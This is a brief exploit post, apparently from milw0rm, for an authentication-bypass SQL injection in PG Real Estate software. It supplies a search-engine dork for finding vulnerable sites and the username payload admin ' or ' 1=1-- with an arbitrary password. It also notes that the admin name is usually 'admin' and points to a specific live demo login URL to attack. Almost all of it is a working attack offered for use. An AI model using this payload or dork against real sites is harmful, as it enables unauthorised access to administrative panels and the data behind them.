PG Real Estate (Auth Bypass) SQL Injection Vulnerability

PG Real Estate (Auth Bypass) SQL Injection Vulnerability

link: http://www.milw0rm.com/exploits/7200

Discovered By: ZoRLu

dork: "Powered by PG Real Estate Solution - real estate web site design"

Exploit:

username: [real_admin_name] ' or ' 1=1

password: ZoRLu

note: generally admin name: admin


exploit for demo:

login: http://www.realtysoft.pro/realestate/demo/admin/index.php

username: admin ' or ' 1=1--

password: ZoRLu